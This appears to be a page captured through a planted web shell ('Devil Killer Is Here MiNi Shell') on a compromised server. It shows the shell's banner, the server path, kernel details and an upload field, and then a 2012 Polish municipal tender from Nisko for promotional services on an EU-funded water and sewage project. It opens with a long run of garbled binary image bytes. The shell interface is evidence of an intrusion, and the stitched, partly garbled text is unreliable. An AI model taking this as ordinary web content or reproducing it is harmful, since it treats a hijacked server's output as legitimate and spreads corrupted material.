JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120717/155327-N-2012.html

<p class="kh_header"><b>Nisko: Działania promocyjno-informacyjne  dotyczące Projektu dofinansowanego  z Funduszu Spójności pn. Uporządkowanie gospodarki wodno-ściekowej  na terenie Gminy i  Miasta Nisko</b><br>
<b>Numer ogłoszenia: 155327 - 2012; data zamieszczenia: 17.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Nisko , Plac Wolności 14, 37-400 Nisko, woj. podkarpackie, tel. 015 8415643, 015 8415638, faks 015 8415630.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nisko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Działania promocyjno-informacyjne  dotyczące Projektu dofinansowanego  z Funduszu Spójności pn. Uporządkowanie gospodarki wodno-ściekowej  na terenie Gminy i  Miasta Nisko.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A. Zakres promocji.
1.	Wykonanie i montaż  tablic informacyjnych w  9-ciu miejscach realizacji projektu oraz w 2-ch miejscach przy wjeździe do Gminy ( razem 11 szt). Wymiary tablic 300x200 cm w układzie poziomym. Powierzchnia informacyjna : metalowa, wyklejana jednostronnie w postaci wielobarwnego wydruku. Konstrukcja : metalowy stelaż samonośny, wolnostojący. Tablice muszą być umieszczane oraz muszą  zawierać elementy zgodne z Zasadami promocji projektów dla beneficjentów Programu Operacyjnego Infrastruktura i Środowisko 2007-2013, które będą załączone do SIWZ .
Zamówienie będzie obejmowało :
a- opracowanie projektu graficznego tablicy na podstawie materiałów przekazanych przez
   Zamawiającego.
b- wykonanie, po zaakceptowaniu przez Zamawiającego, projektu graficznego i treści tablic
c- montaż w miejscach wskazanych przez Zamawiającego
Termin wykonania : dla 9-ciu szt - tablic - 1 m-c od daty podpisania umowy oraz  2 tygodnie od zawiadomienia przez Zamawiającego dla pozostałych 2 szt. tablic.
2.	Wykonanie i montaż 9-ciu szt tablic pamiątkowych,  o wymiarach 120x100 cm - układ poziomy,  w  9-ciu miejscach realizacji projektu.  Powierzchnia informacyjna : metalowa, wyklejana jednostronnie w postaci wielobarwnego wydruku. Konstrukcja : metalowy stelaż samonośny, wolnostojący. Tablice muszą zawierać elementy zgodne z Zasadami promocji projektów dla beneficjentów Programu Operacyjnego Infrastruktura i Środowisko 2007-2013, które będą załączone do SIWZ .
Zamówienie będzie obejmowało :
a- opracowanie projektu graficznego tablicy na podstawie materiałów przekazanych przez
   Zamawiającego.
b- wykonanie, po zaakceptowaniu przez Zamawiającego, projektu graficznego i treści tablic
c- montaż w miejscach wskazanych przez Zamawiającego
Termin wykonania : 6 miesięcy po rzeczowym zakończeniu projektu. Planowane zakończenie projektu - 30.11.2013.
3.	Ogłoszenia w prasie lokalnej, obejmujące przygotowanie i umieszczenie treść 5-ciu ogłoszeń uzgodnionych  przed emisją z Zamawiającym . Wielkość ogłoszeń : na ? strony (9 modułów), w kolorze czarno-białym . Termin wykonania jak w  tabeli Harmonogram działań promocyjno -informacyjnych
4.	Produkcja spotów telewizyjnych o realizowanym projekcie, z emisją w regionalnej TV. Obejmuje opracowanie scenariusza 3-ch różnych  pakietów, zawierających po  jednym 20 sekundowym spocie, z 30-krotną emisja  każdego pakietu w regionalnej TV . Realizacja spotu, w terminach uzgodnionych z Zamawiającym, będzie wymagała uprzedniej akceptacji formy oraz zaprezentowanych informacji .Termin wykonania jak w  tabeli Harmonogram działań promocyjno -informacyjnych.
5.	Promocja projektu poprzez ulotki , broszury i plakaty. Obejmuje opracowanie projektu graficznego, na podstawie materiałów Zamawiającego :
a- 1800szt ulotek formatu A4, składanych na 3 części, na papierze kredowym
   135 g /m2 z dwustronnym zadrukiem
b- 200 szt broszur składanych formatu A5 - 8 stron, na papierze kredowym 135g/m2
c- 100 szt plakatów formatu A3, na papierze kredowym 150 g/m2, z jednostronnym
   zadrukiem
d- insertowanie ulotek do prasy lokalnej w ilości 1500 szt. Pozostała część -500 szt
   będzie rozprowadzona,  przez Zamawiającego.
 Broszury (200 szt) oraz plakaty (100 szt) będą rozprowadzone przez Zamawiającego.
             Promocja projektu przez ulotki, broszury i plakaty,  w terminach uzgodnionych z    
             Zamawiającym, będzie wymagała uprzedniej akceptacji formy oraz zaprezentowanych
             informacji. Termin wykonania jak w  tabeli Harmonogram działań promocyjno -informacyjnych
6.	Promocja projektu materiałem filmowym. Obejmuje opracowanie scenariusza 15- minutowego materiału filmowego o realizowanym projekcie , na podstawie informacji  przekazanych przez Zamawiającego, z emisją w regionalnej TV (1edycja) oraz publikacją tego filmu na 150 szt płyt DVD. Projekt obejmuje 17 następujących zadań realizowanych na terenie Gminy i Miasta :
1. Budowa sieci wodociągowej rozdzielczej w Nisku, osiedle Podwolina -Grady - I etap
2. Budowa sieci wodociągowej rozdzielczej w Nisku osiedle Podwolina - Grądy - II etap
3.Budowa sieci wodociągowej rozdzielczej wraz z pompownią wody w Nisku
   os.Podwolina-Grądy - III etap
4.Budowa sieci wodociągowej w Nisku na Os.Barce - etap I
5.Budowa sieci wodociągowej w Nisku na Os.Barce - etap II
6.Budowa sieci wodociągowej ul.Torowa w Nisku
7.Budowa (odbudowa) z przebudową odcinków kanału ściekowego w ulicy Kościuszki w
   Nisku
8.Budowa sieci kanalizacji sanitarnej w Nisku w ulicy Dworcowej
9.Budowa sieci kanalizacji sanitarnej na osiedlu Warchoły- podłączenie budynków
    wielorodzinnych przy ul.Rzeszowskiej w Nisku
10.Budowa sieci kanalizacji sanitarnej w Nisku na Os.Malce VI etap
11.Budowa sieci kanalizacji sanitarnej w Nisku na os.Barce i os.os.Warchoły, w rejonie
     ul.Piaskowej i Rzeszowskiej - I etap
12. Budowa sieci kanalizacji sanitarnej w Nisku na os.Barce i os.os.Warchoły, w rejonie
     ul.Piaskowej i Rzeszowskiej - II etap
13.Budowa sieci kanalizacji sanitarnej w Nisku na os.Barce i os.Warchoły, w rejonie
     ul.Długiej - III etap
14.Budowa sieci Kanalizacji sanitarnej we wsi Zarzecze gm.Nisko - III etap
15. Budowa sieci Kanalizacji sanitarnej we wsi Zarzecze - etap IV
16.Budowa sieci Kanalizacji sanitarnej we wsi Zarzecze - etap V
17.Budowa wodociągu łączącego sieci wodociągowe Stalowej Woli i Niska ( etap I, etap II,     etap III)
Film powinien zawierać takie istotne cechy projektu jak informację o jego zakresie rzeczowo-finansowym, ujęcia z terenów realizacji projektu na których będą znajdować się takie elementy jak : tablice informacyjne, tablice pamiątkowe , oznaczenia przebiegu sieci wodociągowej betonowymi słupkami, tabliczkami, zbiorniki  na pompowni wody .Na  sieci kanalizacyjnej będą studzienki kanalizacyjne i przepompownie  ścieków. Będzie można przedstawić  zabudowane tereny wzdłuż ulic poszczególnych osiedli i wywiady z ich mieszkańcami. Zamawiający dysponuje danymi rzeczowo-finansowymi  dla poszczególnych zadań i całego przedsięwzięcia. Prezentacja filmu   będzie wymagała uprzedniej akceptacji formy , terminu emisji i  zaprezentowanych   informacji. Termin wykonania jak w tabeli Harmonogram działań promocyjno -informacyjnych.

Harmonogram działań promocyjno -informacyjnych
Lp	Działania promocyjno- informacyjne	Termin wykonania
1.	Tablice informacyjne         wg poz.A.1.    - 9 szt	III kw. 2012 r.
2.	Tablice informacyjne         wg poz.A.1.    - 2 szt	II kw. 2013 r.
3.	Tablice pamiątkowe          wg.poz .A.2     - 9 szt	II kw. 2014 r.
4.	Ogłoszenia w prasie          wg poz.A.3      - 1 ogłoszenie	sierpień 2012 r.
5.	Ogłoszenia w prasie          wg.poz.A.3      - 1 ogłoszenie	grudzień 2012 r.
6.	Ogłoszenia w prasie          wg.poz.A.3      - 1 ogłoszenie	kwiecień 2013 r.
7.	Ogłoszenia w prasie          wg.poz.A.3      - 1 ogłoszenie	lipiec 2013 r.
8.	Ogłoszenia w prasie          wg.poz.A.3      - 1 ogłoszenie	grudzień 2013 r.
9.	Spoty telewizyjne              wg.poz.A.4      - 1 spot	IV kw.2012 r.
10.	Spoty telewizyjne              wg.poz.A.4      - 1 spot	II kw.2013 r.
11.	Spoty telewizyjne              wg.poz.A.4      - 1 spot	IV kw.2013 r.
12.	Ulotki, broszury, plakaty   wg.poz.A 5       - ? kompletu	III kw.2012 r.
13.	Ulotki, broszury, plakaty   wg.poz.A 5       - ? kompletu	III kw.2013 r.
14.	Film + DVD                      wg.poz.A.6       - komplet	IV kw.2013 r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.34.22.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. Zamawiający uzna, że warunek jest spełniony, gdy Wykonawca oświadczy, że posiada uprawnienia do prowadzenia określonej działalności</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. Zamawiający uzna, że warunek jest spełniony, gdy Wykonawca oświadczy, że posiada wiedzę i doświadczenie pozwalające na prawidłową realizację zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. Zamawiający uzna, że warunek jest spełniony, gdy Wykonawca oświadczy, że dysponuje odpowiednim potencjałem wystarczającym do wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. Zamawiający uzna, że warunek jest spełniony, gdy Wykonawca oświadczy, że dysponuje odpowiednim osobami zdolnymi do wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. Zamawiający uzna, że warunek jest spełniony, gdy Wykonawca oświadczy, że znajduje się w sytuacji ekonomicznej i finansowej umożliwiającej wykonanie zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wzór oferty 
Pełnomocnictwo do reprezentowania wykonawcy w niniejszym postępowaniu oraz do podpisania umowy (o ile nie wynika to z dokumentów rejestracyjnych)
Pełnomocnictwo osób podpisujących ofertę do reprezentowania Wykonawcy, zaciągania w jego imieniu zobowiązań finansowych w wysokości odpowiadającej cenie oferty oraz podpisania oferty musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli pełnomocnictwo takie nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy, to do oferty należy dołączyć oryginał lub poświadczoną za zgodność z oryginałem przez notariusza, kopię pełnomocnictwa wystawionego na reprezentanta Wykonawcy przez osoby do tego upełnomocnione.
Wykaz części zamówienia, które wykonawcy wykonają własnymi siłami, a które zamierzają powierzyć podwykonawcom.
Wykonawca jest obowiązany wskazać w ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcom w takim przypadku załącza do oferty odpowiednie oświadczenie. W przypadku braku oświadczenia uznaje się, że oferent samodzielnie wykona zamówienie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Określone są w § 10 wzoru umowy o treści.


1. Zakazana jest istotna zmiana postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem ust. 2 i 4.
2. Dopuszczalne są następujące rodzaje i warunki istotnej zmiany treści umowy:
    1)  zmniejszenie zakresu przedmiotu zamówienia :
a) w razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy w pierwotnym zakresie nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy - z jednoczesnym zmniejszeniem wynagrodzenia stosownie do postanowień ust.2 pkt 2), 
b) ze względu na wprowadzenie nowych przepisów bezpośrednio dotyczących przedmiotu zamówienia (np. ze względu na zmianę wytycznych w zakresie promocji projektów) - z jednoczesnym zmniejszeniem wynagrodzenia stosownie do postanowień ust.2 pkt 2)
 2) zmiana wysokości wynagrodzenia określonego w § 6 ust. 2 i 4 umowy w związku z okolicznościami wymienionymi w ust.2 pkt 1, przy czym w przypadkach określonych w ust.2 pkt 1 - ustalenie zmiany wysokości wynagrodzenia nastąpi według cen jednostkowych określonych w § 6 ust. 4 
3) zmiana terminu realizacji przedmiotu zamówienia, w przypadku:
a) gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie Zamawiającego, 
b)	działania siły wyższej, uniemożliwiającego wykonanie robót w określonym pierwotnie terminie,
c)	konieczności zmniejszenia zakresu przedmiotu zamówienia, gdy jego wykonanie w pierwotnym zakresie nie leży w interesie Zamawiającego,
d)	konieczności zmiany harmonogramu działań promocyjno-informacyjnych i finansowania z powodów niezależnych od stron umowy, 
e)	jakiegokolwiek opóźnienia, utrudnienia lub przeszkody spowodowane przez lub dające się przypisać Zamawiającemu i personelowi Zamawiającego,
3. Zmiany umowy przewidziane w ust. 2 dopuszczalne są na następujących warunkach:
1)  -	ad pkt 1) - zmniejszenie zakresu przedmiotu   umowy w  granicach   uzasadnionego   interesu Zamawiającego,
2) - ad pkt. 2) - w zakresie nie powodującym zwiększenia wynagrodzenia Wykonawcy określonego w niniejszej umowie,
3) - ad pkt. 3): 
- lit. a) - w zakresie uzasadnionego interesu Zamawiającego,
- lit. b) - o czas działania siły wyższej oraz potrzebny do usunięcia skutków tego działania,
- lit. c) - o czas proporcjonalny do zmniejszonego zakresu,
- lit. d) - o czas niezbędny do wprowadzenia zmian opisanych przy lit. d), 
- lit. e) - o czas opóźnienia, utrudnienia lub przeszkody opisanych przy lit.e).
4.   Oprócz przypadku określonego w ust.2 pkt 2, wynagrodzenie Wykonawcy o którym mowa w § 6 ust.2 i 4 może ulec zmianie w zakresie zmiany ustawowej wysokości stawki podatku VAT: jeżeli w trakcie realizacji przedmiotu umowy nastąpi zmiana stawki podatku VAT dla usług objętych przedmiotem zamówienia, Strony dokonają odpowiedniej zmiany wynagrodzenia umownego - dotyczy to części wynagrodzenia za działania promocyjno-informacyjne , których w dniu zmiany stawki podatku VAT jeszcze nie wykonano.  
5.  Wszelkie zmiany niniejszej umowy wymagają zgody obu stron wyrażonej w formie pisemnego aneksu do umowy pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.nisko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego, pok 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.07.2012 godzina 09:30, miejsce: w siedzibie Zamawiającego pokój nr 7 (biuro obsługi klienta)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




